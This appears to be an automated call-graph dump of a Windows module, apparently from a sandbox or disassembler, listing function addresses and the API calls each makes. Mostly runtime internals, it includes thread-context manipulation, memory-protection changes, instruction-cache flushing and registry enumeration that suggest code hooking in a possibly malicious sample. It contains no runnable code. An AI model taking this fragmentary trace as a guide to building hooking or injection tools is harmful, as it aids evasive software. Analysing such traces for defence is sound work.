10691->10692 10692->10688 10697 1c59ef48 10693->10697 10694 1c59ef4d 10695 1c59ef63 10694->10695 10696 1c59b960 _set_errno_from_matherr 13 API calls 10694->10696 10695->10657 10698 1c59ef57 10696->10698 10697->10694 10697->10695 10700 1c59ef92 10697->10700 10699 1c59b840 _invalid_parameter_noinfo 30 API calls 10698->10699 10699->10695 10700->10695 10701 1c59b960 _set_errno_from_matherr 13 API calls 10700->10701 10701->10698 10703 1c59d3ec try_get_function 5 API calls 10702->10703 10704 1c59c1ed 10703->10704 10705 1c59ba4c 10704->10705 10706 1c59ba75 10705->10706 10707 1c59ba97 10705->10707 10710 1c59b9f8 __free_lconv_mon 13 API calls 10706->10710 10717 1c59ba83 FindFirstFileExW 10706->10717 10708 1c59ba9b 10707->10708 10709 1c59baf0 10707->10709 10712 1c59baaf 10708->10712 10713 1c59b9f8 __free_lconv_mon 13 API calls 10708->10713 10708->10717 10711 1c59d144 MultiByteToWideChar 10709->10711 10710->10717 10720 1c59bb0b 10711->10720 10749 1c59af2c 10712->10749 10713->10712 10715 1c59bb12 GetLastError 10756 1c59b8f0 10715->10756 10716 1c59bb4b 10716->10717 10721 1c59d144 MultiByteToWideChar 10716->10721 10717->10679 10719 1c59bb3f 10724 1c59af2c 14 API calls 10719->10724 10720->10715 10720->10716 10720->10719 10723 1c59b9f8 __free_lconv_mon 13 API calls 10720->10723 10725 1c59bb93 10721->10725 10722 1c59bb1f 10726 1c59b960 _set_errno_from_matherr 13 API calls 10722->10726 10723->10719 10724->10716 10725->10715 10725->10717 10726->10717 10728 1c59bbed 10727->10728 10729 1c59bc0f 10727->10729 10733 1c59b9f8 __free_lconv_mon 13 API calls 10728->10733 10740 1c59bbfb 10728->10740 10730 1c59bc68 10729->10730 10731 1c59bc14 10729->10731 10761 1c59d1a0 10730->10761 10734 1c59bc28 10731->10734 10735 1c59b9f8 __free_lconv_mon 13 API calls 10731->10735 10731->10740 10733->10740 10736 1c59af2c 14 API calls 10734->10736 10735->10734 10736->10740 10740->10686 10750 1c59af77 10749->10750 10754 1c59af3b _set_errno_from_matherr 10749->10754 10752 1c59b960 _set_errno_from_matherr 13 API calls 10750->10752 10751 1c59af5e HeapAlloc 10753 1c59af75 10751->10753 10751->10754 10752->10753 10753->10717 10754->10750 10754->10751 10755 1c599e44 _set_errno_from_matherr 2 API calls 10754->10755 10755->10754 10757 1c59b4c4 _set_errno_from_matherr 13 API calls 10756->10757 10758 1c59b901 10757->10758 10759 1c59b4c4 _set_errno_from_matherr 13 API calls 10758->10759 10760 1c59b91a 10759->10760 10760->10722 10763 1c59d1c3 WideCharToMultiByte 10761->10763 10764 1c59a150 10765 1c59a16d GetModuleHandleW 10764->10765 10766 1c59a1b7 10764->10766 10765->10766 10772 1c59a17a 10765->10772 10779 1c59a048 10766->10779 10772->10766 10774 1c59a258 GetModuleHandleExW 10772->10774 10775 1c59a295 10774->10775 10776 1c59a27e GetProcAddress 10774->10776 10777 1c59a2ad 10775->10777 10778 1c59a2a7 FreeLibrary 10775->10778 10776->10775 10777->10766 10778->10777 10793 1c59aebc EnterCriticalSection 10779->10793 10923 1c595654 10924 1c59565a 10923->10924 10935 1c597c90 10924->10935 10928 1c5956be 10930 1c595757 _invalid_parameter_noinfo 10930->10928 10932 1c5958dd 10930->10932 10948 1c597860 10930->10948 10931 1c5959db 10932->10931 10933 1c595a57 VirtualProtect 10932->10933 10933->10928 10934 1c595a83 GetLastError 10933->10934 10934->10928 10938 1c597c9b 10935->10938 10936 1c59569d 10936->10928 10944 1c5940e0 10936->10944 10937 1c599e44 _set_errno_from_matherr 2 API calls 10937->10938 10938->10936 10938->10937 10939 1c597cba 10938->10939 10940 1c597cc5 10939->10940 10954 1c5984bc 10939->10954 10958 1c5984dc 10940->10958 10945 1c5940fd 10944->10945 10947 1c59416c _invalid_parameter_noinfo 10945->10947 10967 1c594350 10945->10967 10947->10930 10949 1c5978a7 10948->10949 10992 1c597630 10949->10992 10952 1c597d60 _handle_error 8 API calls 10953 1c5978d1 10952->10953 10953->10930 10955 1c5984ca std::bad_alloc::bad_alloc 10954->10955 10962 1c5995f0 10955->10962 10957 1c5984db 10959 1c5984ea std::bad_alloc::bad_alloc 10958->10959 10960 1c5995f0 Concurrency::cancel_current_task 2 API calls 10959->10960 10961 1c597ccb 10960->10961 10963 1c59962c RtlPcToFileHeader 10962->10963 10964 1c59960f 10962->10964 10965 1c599653 RaiseException 10963->10965 10966 1c599644 10963->10966 10964->10963 10965->10957 10966->10965 10968 1c594397 10967->10968 10969 1c594374 10967->10969 10970 1c5943cd 10968->10970 10987 1c593f30 10968->10987 10969->10968 10981 1c593e00 10969->10981 10973 1c593f30 2 API calls 10970->10973 10974 1c5943fd 10970->10974 10973->10974 10976 1c593e00 3 API calls 10974->10976 10979 1c594433 10974->10979 10975 1c593e00 3 API calls 10977 1c59444f 10975->10977 10976->10979 10978 1c593f30 2 API calls 10977->10978 10980 1c59446b 10977->10980 10978->10980 10979->10975 10979->10977 10980->10947 10982 1c593e21 _invalid_parameter_noinfo 10981->10982 10983 1c593e76 VirtualQuery 10982->10983 10984 1c593e90 10982->10984 10985 1c593eaa VirtualAlloc 10982->10985 10983->10982 10983->10984 10984->10968 10985->10984 10986 1c593edb GetLastError 10985->10986 10986->10982 10986->10984 10990 1c593f48 _invalid_parameter_noinfo 10987->10990 10988 1c593fb7 10988->10970 10989 1c593f9d VirtualQuery 10989->10988 10989->10990 10990->10988 10990->10989 10991 1c594002 GetLastError 10990->10991 10991->10988 10991->10990 10993 1c59764b 10992->10993 10994 1c59766f 10993->10994 10995 1c597661 SetLastError 10993->10995 10994->10952 10995->10994 10996 1c59fa54 10999 1c59cd58 10996->10999 11000 1c59cdaa 10999->11000 11001 1c59cd65 10999->11001 11005 1c59b41c 11001->11005 11006 1c59b432 11005->11006 11007 1c59b42d 11005->11007 11009 1c59d728 _set_errno_from_matherr 6 API calls 11006->11009 11028 1c59b43a 11006->11028 11008 1c59d6e0 _set_errno_from_matherr 6 API calls 11007->11008 11008->11006 11010 1c59b451 11009->11010 11012 1c59b980 _set_errno_from_matherr 13 API calls 11010->11012 11010->11028 11011 1c59acb4 33 API calls 11013 1c59b4c2 11011->11013 11014 1c59b464 11012->11014 11015 1c59b482 11014->11015 11016 1c59b472 11014->11016 11019 1c59d728 _set_errno_from_matherr 6 API calls 11015->11019 11018 1c59d728 _set_errno_from_matherr 6 API calls 11016->11018 11017 1c59b4b4 11030 1c59cae0 11017->11030 11020 1c59b479 11018->11020 11021 1c59b48a 11019->11021 11026 1c59b9f8 __free_lconv_mon 13 API calls 11020->11026 11022 1c59b48e 11021->11022 11023 1c59b4a0 11021->11023 11024 1c59d728 _set_errno_from_matherr 6 API calls 11022->11024 11025 1c59b0b4 _set_errno_from_matherr 13 API calls 11023->11025 11024->11020 11027 1c59b4a8 11025->11027 11026->11028 11027->11028 11029 1c59b9f8 __free_lconv_mon 13 API calls 11027->11029 11028->11011 11028->11017 11029->11028 11048 1c59cca0 11030->11048 11032 1c59cb09 11063 1c59c7ec 11032->11063 11035 1c59cb23 11035->11000 11036 1c59af2c 14 API calls 11039 1c59cb34 11036->11039 11037 1c59cbcf 11038 1c59b9f8 __free_lconv_mon 13 API calls 11037->11038 11038->11035 11039->11037 11070 1c59cdd4 11039->11070 11042 1c59cbca 11043 1c59b960 _set_errno_from_matherr 13 API calls 11042->11043 11043->11037 11044 1c59cc2c 11044->11037 11081 1c59c630 11044->11081 11045 1c59cbef 11045->11044 11046 1c59b9f8 __free_lconv_mon 13 API calls 11045->11046 11046->11044 11049 1c59ccc3 11048->11049 11052 1c59cccd 11049->11052 11096 1c59aebc EnterCriticalSection 11049->11096 11051 1c59cd3f 11051->11032 11052->11051 11053 1c59acb4 33 API calls 11052->11053 11057 1c59cd57 11053->11057 11058 1c59cdaa 11057->11058 11060 1c59b41c 33 API calls 11057->11060 11058->11032 11061 1c59cd94 11060->11061 11062 1c59cae0 43 API calls 11061->11062 11062->11058 11064 1c59ad0c 33 API calls 11063->11064 11065 1c59c800 11064->11065 11066 1c59c80c GetOEMCP 11065->11066 11067 1c59c81e 11065->11067 11068 1c59c833 11066->11068 11067->11068 11069 1c59c823 GetACP 11067->11069 11068->11035 11068->11036 11069->11068 11071 1c59c7ec 35 API calls 11070->11071 11072 1c59cdff 11071->11072 11074 1c59ce3c IsValidCodePage 11072->11074 11079 1c59ce7f _invalid_parameter_noinfo 11072->11079 11073 1c597d60 _handle_error 8 API calls 11075 1c59cbc3 11073->11075 11076 1c59ce4d 11074->11076 11074->11079 11075->11042 11075->11045 11077 1c59ce84 GetCPInfo 11076->11077 11080 1c59ce56 _invalid_parameter_noinfo 11076->11080 11077->11079 11077->11080 11079->11073 11097 1c59c8fc 11080->11097 11165 1c59aebc EnterCriticalSection 11081->11165 11098 1c59c939 GetCPInfo 11097->11098 11107 1c59ca2f 11097->11107 11103 1c59c94c 11098->11103 11098->11107 11099 1c597d60 _handle_error 8 API calls 11101 1c59cac8 11099->11101 11101->11079 11108 1c59f514 11103->11108 11106 1c59f9bc 37 API calls 11106->11107 11107->11099 11109 1c59ad0c 33 API calls 11108->11109 11110 1c59f556 11109->11110 11111 1c59d144 MultiByteToWideChar 11110->11111 11113 1c59f58c 11111->11113 11112 1c59f593 11115 1c597d60 _handle_error 8 API calls 11112->11115 11113->11112 11114 1c59af2c 14 API calls 11113->11114 11118 1c59f5b8 _invalid_parameter_noinfo 11113->11118 11114->11118 11116 1c59c9c3 11115->11116 11123 1c59f9bc 11116->11123 11117 1c59f650 11117->11112 11120 1c59b9f8 __free_lconv_mon 13 API calls 11117->11120 11118->11117 11119 1c59d144 MultiByteToWideChar 11118->11119 11121 1c59f632 11119->11121 11120->11112 11121->11117 11122 1c59f636 GetStringTypeW 11121->11122 11122->11117 11124 1c59ad0c 33 API calls 11123->11124 11125 1c59f9e1 11124->11125 11128 1c59f6a4 11125->11128 11129 1c59f6e6 11128->11129 11130 1c59d144 MultiByteToWideChar 11129->11130 11131 1c59f730 11130->11131 11134 1c59af2c 14 API calls 11131->11134 11136 1c59f763 11131->11136 11138 1c59f96f 11131->11138 11132 1c597d60 _handle_error 8 API calls 11133 1c59c9f6 11132->11133 11133->11106 11134->11136 11135 1c59d144 MultiByteToWideChar 11137 1c59f7d5 11135->11137 11136->11135 11139 1c59f867 11136->11139 11137->11139 11156 1c59d7e0 11137->11156 11138->11132 11139->11138 11140 1c59b9f8 __free_lconv_mon 13 API calls 11139->11140 11140->11138 11143 1c59f824 11143->11139 11146 1c59d7e0 6 API calls 11143->11146 11144 1c59f876 11145 1c59af2c 14 API calls 11144->11145 11148 1c59f890 11144->11148 11145->11148 11146->11139 11147 1c59d7e0 6 API calls 11150 1c59f911 11147->11150 11148->11139 11148->11147 11149 1c59f946 11149->11139 11151 1c59b9f8 __free_lconv_mon 13 API calls 11149->11151 11150->11149 11152 1c59d1a0 WideCharToMultiByte 11150->11152 11151->11139 11153 1c59f940 11152->11153 11153->11149 11154 1c59f9a6 11153->11154 11154->11139 11155 1c59b9f8 __free_lconv_mon 13 API calls 11154->11155 11155->11139 11157 1c59d3ec try_get_function 5 API calls 11156->11157 11158 1c59d81e 11157->11158 11161 1c59d823 11158->11161 11162 1c59d8bc 11158->11162 11160 1c59d87f LCMapStringW 11160->11161 11161->11139 11161->11143 11161->11144 11163 1c59d3ec try_get_function 5 API calls 11162->11163 11164 1c59d8ea 11163->11164 11164->11160 11574 1c59d354 11575 1c59d393 11574->11575 11576 1c59d376 11574->11576 11577 1c59d39d 11575->11577 11583 1c59fa6c 11575->11583 11576->11575 11578 1c59d384 11576->11578 11590 1c59faa8 11577->11590 11580 1c59b960 _set_errno_from_matherr 13 API calls 11578->11580 11582 1c59d389 _invalid_parameter_noinfo 11580->11582 11584 1c59fa8e HeapSize 11583->11584 11585 1c59fa75 11583->11585 11586 1c59b960 _set_errno_from_matherr 13 API calls 11585->11586 11587 1c59fa7a 11586->11587 11588 1c59b840 _invalid_parameter_noinfo 30 API calls 11587->11588 11589 1c59fa85 11588->11589 11589->11577 11591 1c59fabd 11590->11591 11592 1c59fac7 11590->11592 11593 1c59af2c 14 API calls 11591->11593 11594 1c59facc 11592->11594 11600 1c59fad3 _set_errno_from_matherr 11592->11600 11598 1c59fac5 11593->11598 11595 1c59b9f8 __free_lconv_mon 13 API calls 11594->11595 11595->11598 11596 1c59fad9 11599 1c59b960 _set_errno_from_matherr 13 API calls 11596->11599 11597 1c59fb06 HeapReAlloc 11597->11598 11597->11600 11598->11582 11599->11598 11600->11596 11600->11597 11601 1c599e44 _set_errno_from_matherr 2 API calls 11600->11601 11601->11600 10220 1c599448 10227 1c5998c4 10220->10227 10223 1c599455 10243 1c599bac 10227->10243 10230 1c599451 10230->10223 10232 1c599858 10230->10232 10231 1c5998f8 __vcrt_uninitialize_locks DeleteCriticalSection 10231->10230 10257 1c599a80 10232->10257 10248 1c599930 10243->10248 10246 1c5998dc 10246->10230 10246->10231 10247 1c599bf7 InitializeCriticalSectionAndSpinCount 10247->10246 10249 1c599974 try_get_function 10248->10249 10255 1c599a4a 10248->10255 10250 1c5999a2 LoadLibraryExW 10249->10250 10251 1c599a39 GetProcAddress 10249->10251 10249->10255 10256 1c5999e5 LoadLibraryExW 10249->10256 10252 1c599a19 10250->10252 10253 1c5999c3 GetLastError 10250->10253 10251->10255 10252->10251 10254 1c599a30 FreeLibrary 10252->10254 10253->10249 10254->10251 10255->10246 10255->10247 10256->10249 10256->10252 10258 1c599930 __vcrt_InitializeCriticalSectionEx 5 API calls 10257->10258 10259 1c599aa5 TlsAlloc 10258->10259 11217 1c591ac8 11224 1c591628 GetProcessHeap HeapAlloc 11217->11224 11219 1c591ad7 11220 1c591ade Sleep 11219->11220 11223 1c591598 StrCmpIW StrCmpW 11219->11223 11275 1c5918b4 11219->11275 11221 1c591628 50 API calls 11220->11221 11221->11219 11223->11219 11292 1c591268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11224->11292 11226 1c591650 11293 1c591000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11226->11293 11228 1c591658 11294 1c591268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11228->11294 11230 1c591661 11295 1c591268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11230->11295 11232 1c59166a 11296 1c591268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11232->11296 11234 1c591673 11297 1c591000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11234->11297 11236 1c59167c 11298 1c591000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11236->11298 11238 1c591685 11299 1c591000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11238->11299 11240 1c59168e RegOpenKeyExW 11241 1c5916c0 RegOpenKeyExW 11240->11241 11242 1c5918a6 11240->11242 11243 1c5916e9 11241->11243 11244 1c5916ff RegOpenKeyExW 11241->11244 11242->11219 11300 1c5912bc RegQueryInfoKeyW 11243->11300 11246 1c59173a RegOpenKeyExW 11244->11246 11247 1c591723 11244->11247 11250 1c59175e 11246->11250 11251 1c591775 RegOpenKeyExW 11246->11251 11309 1c59104c RegQueryInfoKeyW 11247->11309 11255 1c5912bc 16 API calls 11250->11255 11252 1c591799 11251->11252 11253 1c5917b0 RegOpenKeyExW 11251->11253 11256 1c5912bc 16 API calls 11252->11256 11257 1c5917eb RegOpenKeyExW 11253->11257 11258 1c5917d4 11253->11258 11259 1c59176b RegCloseKey 11255->11259 11260 1c5917a6 RegCloseKey 11256->11260 11262 1c59180f 11257->11262 11263 1c591826 RegOpenKeyExW 11257->11263 11261 1c5912bc 16 API calls 11258->11261 11259->11251 11260->11253 11264 1c5917e1 RegCloseKey 11261->11264 11265 1c59104c 6 API calls 11262->11265 11266 1c59184a 11263->11266 11267 1c591861 RegOpenKeyExW 11263->11267 11264->11257 11270 1c59181c RegCloseKey 11265->11270 11271 1c59104c 6 API calls 11266->11271 11268 1c59189c RegCloseKey 11267->11268 11269 1c591885 11267->11269 11268->11242 11272 1c59104c 6 API calls 11269->11272 11270->11263 11273 1c591857 RegCloseKey 11271->11273 11274 1c591892 RegCloseKey 11272->11274 11273->11267 11274->11268 11314 1c5914a4 11275->11314 11292->11226 11293->11228 11294->11230 11295->11232 11296->11234 11297->11236 11298->11238 11299->11240 11301 1c59148a RegCloseKey 11300->11301 11302 1c591327 GetProcessHeap HeapAlloc 11300->11302 11301->11244 11303 1c591352 RegEnumValueW 11302->11303 11304 1c591476 GetProcessHeap HeapFree 11302->11304 11305 1c5913a5 11303->11305 11304->11301 11305->11303 11305->11304 11306 1c59152c 2 API calls 11305->11306 11307 1c59141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 11305->11307 11308 1c5913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 11305->11308 11306->11305 11307->11305 11308->11307 11310 1c5910bf 11309->11310 11311 1c5911b7 RegCloseKey 11309->11311 11310->11311 11312 1c5910cf RegEnumValueW 11310->11312 11313 1c591150 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 11310->11313 11311->11246 11312->11310 11313->11310 11315 1c5914e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 11314->11315 11316 1c5914c1 GetProcessHeap HeapFree 11314->11316 11316->11315 11316->11316 11641 1c5a2bc2 11642 1c5a2bdb 11641->11642 11643 1c5a2bd1 11641->11643 11645 1c59af10 LeaveCriticalSection 11643->11645 10801 1c59d940 10802 1c59d979 10801->10802 10804 1c59d94a 10801->10804 10803 1c59d95f FreeLibrary 10803->10804 10804->10802 10804->10803 10581 1c5960c3 10582 1c5960d0 10581->10582 10583 1c5960dc GetThreadContext 10582->10583 10589 1c59623a 10582->10589 10584 1c596102 10583->10584 10583->10589 10584->10589 10591 1c596129 10584->10591 10585 1c5961ad 10586 1c59631e 10588 1c59633e 10586->10588 10599 1c594800 10586->10599 10587 1c596261 VirtualProtect FlushInstructionCache 10587->10589 10603 1c595210 GetCurrentProcess 10588->10603 10589->10586 10589->10587 10591->10585 10594 1c596186 SetThreadContext 10591->10594 10593 1c596343 10595 1c596397 10593->10595 10596 1c596357 ResumeThread 10593->10596 10594->10585 10597 1c597d60 _handle_error 8 API calls 10595->10597 10596->10593 10598 1c5963df 10597->10598 10601 1c59481c 10599->10601 10600 1c59487f 10600->10588 10601->10600 10602 1c594832 VirtualFree 10601->10602 10602->10601 10606 1c59522c 10603->10606 10604 1c595273 10604->10593 10605 1c595242 VirtualProtect FlushInstructionCache 10605->10606 10606->10604 10606->10605 11602 1c592344 GetProcessIdOfThread GetCurrentProcessId 11603 1c5923ea 11602->11603 11604 1c59236f CreateFileW 11602->11604 11604->11603 11605 1c5923a3 WriteFile ReadFile CloseHandle 11604->11605 11605->11603 11606 1c59ab44 11607 1c59b9f8 __free_lconv_mon 13 API calls 11606->11607 11608 1c59ab54 11607->11608 11609 1c59b9f8 __free_lconv_mon 13 API calls 11608->11609 11610 1c59ab68 11609->11610 11611 1c59b9f8 __free_lconv_mon 13 API calls 11610->11611 11612 1c59ab7c 11611->11612 11613 1c59b9f8 __free_lconv_mon 13 API calls 11612->11613 11614 1c59ab90 11613->11614 10261 1c59f478 10262 1c59f480 10261->10262 10263 1c59f495 10262->10263 10265 1c59f4ae 10262->10265 10264 1c59b960 _set_errno_from_matherr 13 API calls 10263->10264 10266 1c59f49a 10264->10266 10269 1c59f4a5 10265->10269 10273 1c59ad0c 10265->10273 10270 1c59b840 10266->10270 10281 1c59b790 10270->10281 10274 1c59ad30 10273->10274 10275 1c59ad2b 10273->10275 10274->10275 10315 1c59b348 GetLastError 10274->10315 10275->10269 10282 1c59b4c4 _set_errno_from_matherr 13 API calls 10281->10282 10283 1c59b7b5 10282->10283 10284 1c59b7c6 10283->10284 10289 1c59b860 IsProcessorFeaturePresent 10283->10289 10284->10269 10290 1c59b873 10289->10290 10293 1c59b62c 10290->10293 10294 1c59b666 _invalid_parameter_noinfo 10293->10294 10295 1c59b68e RtlCaptureContext RtlLookupFunctionEntry 10294->10295 10296 1c59b6c8 RtlVirtualUnwind 10295->10296 10297 1c59b6fe IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10295->10297 10296->10297 10298 1c59b750 _invalid_parameter_noinfo 10297->10298 10301 1c597d60 10298->10301 10303 1c597d69 10301->10303 10302 1c59854c IsProcessorFeaturePresent 10305 1c598564 10302->10305 10303->10302 10304 1c597d74 GetCurrentProcess TerminateProcess 10303->10304 10310 1c598740 RtlCaptureContext 10305->10310 10311 1c59875a RtlLookupFunctionEntry 10310->10311 10312 1c598577 10311->10312 10313 1c598770 RtlVirtualUnwind 10311->10313 10314 1c598518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10312->10314 10313->10311 10313->10312 10316 1c59b36a 10315->10316 10319 1c59b36f 10315->10319 10317 1c59d6e0 _set_errno_from_matherr 6 API calls 10316->10317 10317->10319 10318 1c59d728 _set_errno_from_matherr 6 API calls 10320 1c59b392 10318->10320 10319->10318 10321 1c59b377 SetLastError 10319->10321 10320->10321 10323 1c59b980 _set_errno_from_matherr 13 API calls 10320->10323 10325 1c59b416 10321->10325 10326 1c59ad4b 10321->10326 10324 1c59b3a5 10323->10324 10327 1c59b3c3 10324->10327 10328 1c59b3b3 10324->10328 10373 1c59acb4 10325->10373 10365 1c59e604 10326->10365 10331 1c59d728 _set_errno_from_matherr 6 API calls 10327->10331 10332 1c59d728 _set_errno_from_matherr 6 API calls 10328->10332 10333 1c59b3cb 10331->10333 10334 1c59b3ba 10332->10334 10335 1c59b3cf 10333->10335 10336 1c59b3e1 10333->10336 10342 1c59b9f8 __free_lconv_mon 13 API calls 10334->10342 10338 1c59d728 _set_errno_from_matherr 6 API calls 10335->10338 10340 1c59b0b4 _set_errno_from_matherr 13 API calls 10336->10340 10338->10334 10343 1c59b3e9 10340->10343 10342->10321 10345 1c59b9f8 __free_lconv_mon 13 API calls 10343->10345 10345->10321 10366 1c59e619 10365->10366 10368 1c59ad6e 10365->10368 10366->10368 10417 1c59eaac 10366->10417 10369 1c59e638 10368->10369 10370 1c59e64d 10369->10370 10371 1c59e660 10369->10371 10370->10371 10430 1c59cdb8 10370->10430 10371->10275 10382 1c59dd28 10373->10382 10408 1c59dce0 10382->10408 10413 1c59aebc EnterCriticalSection 10408->10413 10418 1c59b348 33 API calls 10417->10418 10419 1c59eabb 10418->10419 10420 1c59eb06 10419->10420 10429 1c59aebc EnterCriticalSection 10419->10429 10420->10368 10431 1c59b348 33 API calls 10430->10431 10432 1c59cdc1 10431->10432 10433 1c59e47c 10434 1c59e4a4 10433->10434 10440 1c59e4b2 10433->10440 10435 1c59ad0c 33 API calls 10434->10435 10434->10440 10436 1c59e4d0 10435->10436 10437 1c59e4de 10436->10437 10438 1c59e500 10436->10438 10449 1c5a0e04 10437->10449 10438->10440 10452 1c5a0db8 10438->10452 10443 1c59e596 10446 1c59d144 MultiByteToWideChar 10443->10446 10444 1c59e544 10445 1c59e579 10444->10445 10455 1c59d144 10444->10455 10445->10440 10447 1c59b960 _set_errno_from_matherr 13 API calls 10445->10447 10446->10445 10447->10440 10458 1c5a14c4 10449->10458 10453 1c59ad0c 33 API calls 10452->10453 10454 1c59e540 10453->10454 10454->10443 10454->10444 10456 1c59d14c MultiByteToWideChar 10455->10456 10462 1c5a1521 10458->10462 10463 1c5a152d 10458->10463 10459 1c597d60 _handle_error 8 API calls 10461 1c5a0e17 10459->10461 10460 1c59b960 _set_errno_from_matherr 13 API calls 10460->10462 10461->10440 10462->10459 10463->10460 10463->10462 11326 1c597efc 11333 1c599470 11326->11333 11329 1c597f09 11342 1c599798 11333->11342 11336 1c59abb4 11337 1c59b4c4 _set_errno_from_matherr 13 API calls 11336->11337 11338 1c597f12 11337->11338 11338->11329 11339 1c599484 11338->11339 11358 1c59972c 11339->11358 11341 1c59948f 11341->11329 11343 1c597f05 11342->11343 11344 1c5997b7 GetLastError 11342->11344 11343->11329 11343->11336 11354 1c599b10 11344->11354 11355 1c599930 __vcrt_InitializeCriticalSectionEx 5 API calls 11354->11355 11357 1c599b37 TlsGetValue 11355->11357 11360 1c599740 11358->11360 11363 1c59975a __std_exception_destroy 11358->11363 11359 1c59974a 11364 1c599b58 11359->11364 11360->11359 11361 1c599b10 __vcrt_freeptd 6 API calls 11360->11361 11361->11359 11363->11341 11365 1c599930 __vcrt_InitializeCriticalSectionEx 5 API calls 11364->11365 11366 1c599b86 11365->11366 11367 1c599b98 TlsSetValue 11366->11367 11368 1c599b90 11366->11368 11367->11368 11368->11363 11166 1c59ae74 11167 1c59ae7c 11166->11167 11169 1c59aead 11167->11169 11171 1c59aea9 11167->11171 11172 1c59d77c 11167->11172 11177 1c59aed8 11169->11177 11173 1c59d3ec try_get_function 5 API calls 11172->11173 11174 1c59d7b2 11173->11174 11175 1c59d7c7 InitializeCriticalSectionAndSpinCount 11174->11175 11176 1c59d7bc 11174->11176 11175->11176 11176->11167 11178 1c59af03 11177->11178 11179 1c59af07 11178->11179 11180 1c59aee6 DeleteCriticalSection 11178->11180 11179->11171 11180->11178 11181 1c592a74 11182 1c592ac8 11181->11182 11183 1c592ae3 11182->11183 11185 1c5933f8 11182->11185 11186 1c593490 11185->11186 11188 1c59341d 11185->11188 11186->11183 11187 1c593c70 StrCmpNIW 11187->11188 11188->11186 11188->11187 11189 1c591d08 StrCmpIW StrCmpW 11188->11189 11189->11188 11615 1c598376 11616 1c599538 __std_exception_copy 30 API calls 11615->11616 11617 1c5983a1 11616->11617 10607 1c5928e8 10609 1c59292d 10607->10609 10608 1c592990 10609->10608 10610 1c593c70 StrCmpNIW 10609->10610 10610->10609 11369 1c59e2e8 11370 1c59e312 11369->11370 11371 1c59b980 _set_errno_from_matherr 13 API calls 11370->11371 11372 1c59e331 11371->11372 11373 1c59b9f8 __free_lconv_mon 13 API calls 11372->11373 11374 1c59e33f 11373->11374 11375 1c59b980 _set_errno_from_matherr 13 API calls 11374->11375 11379 1c59e369 11374->11379 11376 1c59e35b 11375->11376 11378 1c59b9f8 __free_lconv_mon 13 API calls 11376->11378 11377 1c59d77c 6 API calls 11377->11379 11378->11379 11379->11377 11380 1c59e372 11379->11380 10805 1c59596d 10806 1c595974 10805->10806 10807 1c5959db 10806->10807 10808 1c595a57 VirtualProtect 10806->10808 10809 1c595a91 10808->10809 10810 1c595a83 GetLastError 10808->10810 10810->10809 11190 1c5a2a61 __scrt_dllmain_exception_filter 11646 1c59dbe4 11647 1c59dbf0 11646->11647 11648 1c59dc17 11647->11648 11650 1c59fc7c 11647->11650 11651 1c59fc81 11650->11651 11655 1c59fcbc 11650->11655 11652 1c59fca2 DeleteCriticalSection 11651->11652 11653 1c59fcb4 11651->11653 11652->11652 11652->11653 11654 1c59b9f8 __free_lconv_mon 13 API calls 11653->11654 11654->11655 11655->11647 10811 1c592118 10812 1c592149 10811->10812 10813 1c592239 10812->10813 10814 1c59226e 10812->10814 10820 1c59216c 10812->10820 10815 1c592279 10814->10815 10816 1c5922e8 10814->10816 10828 1c5931c0 GetProcessHeap HeapAlloc 10815->10828 10816->10813 10818 1c5931c0 11 API calls 10816->10818 10818->10813 10819 1c5921b4 StrCmpNIW 10819->10820 10820->10813 10820->10819 10822 1c591c28 10820->10822 10823 1c591c5a GetProcessHeap HeapAlloc 10822->10823 10824 1c591cb4 10822->10824 10823->10824 10825 1c591c92 10823->10825 10824->10820 10826 1c591bf4 2 API calls 10825->10826 10827 1c591c9a GetProcessHeap HeapFree 10826->10827 10827->10824 10829 1c593213 10828->10829 10830 1c5932dd GetProcessHeap HeapFree 10829->10830 10831 1c5932d8 10829->10831 10832 1c59326a StrCmpNIW 10829->10832 10833 1c591c28 6 API calls 10829->10833 10830->10813 10831->10830 10832->10829 10833->10829 11191 1c592618 11192 1c592699 _invalid_parameter_noinfo 11191->11192 11193 1c5926fe GetFileType 11192->11193 11204 1c59288f 11192->11204 11194 1c59270c StrCpyW 11193->11194 11195 1c592722 11193->11195 11196 1c592731 11194->11196 11197 1c5919d8 4 API calls 11195->11197 11201 1c59273b 11196->11201 11205 1c5927e0 11196->11205 11197->11196 11198 1c593c70 StrCmpNIW 11198->11201 11199 1c593c70 StrCmpNIW 11199->11205 11200 1c59330c 4 API calls 11200->11201 11201->11198 11201->11200 11202 1c591cd4 2 API calls 11201->11202 11201->11204 11202->11201 11203 1c59330c 4 API calls 11203->11205 11205->11199 11205->11203 11205->11204 11206 1c591cd4 2 API calls 11205->11206 11206->11205 10834 1c59d11c GetCommandLineA GetCommandLineW 10464 1c592c10 10465 1c592c81 10464->10465 10466 1c592e87 10465->10466 10467 1c592cb1 GetModuleHandleA 10465->10467 10468 1c592cc3 GetProcAddress 10467->10468 10469 1c592cd5 10467->10469 10468->10469 10469->10466 10470 1c592cfc StrCmpNIW 10469->10470 10470->10466 10473 1c592d21 10470->10473 10471 1c592e34 lstrlenW 10471->10473 10472 1c591934 6 API calls 10472->10473 10473->10466 10473->10471 10473->10472 10476 1c591bf4 10473->10476 10480 1c593c70 10473->10480 10477 1c591c0b 10476->10477 10478 1c591c14 10476->10478 10483 1c59152c 10477->10483 10478->10473 10481 1c593c7d StrCmpNIW 10480->10481 10482 1c593c92 10480->10482 10481->10482 10482->10473 10484 1c59157c 10483->10484 10487 1c591546 10483->10487 10484->10478 10485 1c59155d StrCmpIW 10485->10487 10486 1c591565 StrCmpW 10486->10487 10487->10484 10487->10485 10487->10486 10835 1c596110 10836 1c59611d 10835->10836 10837 1c596129 10836->10837 10845 1c59623a 10836->10845 10838 1c5961ad 10837->10838 10839 1c596186 SetThreadContext 10837->10839 10839->10838 10840 1c59631e 10842 1c59633e 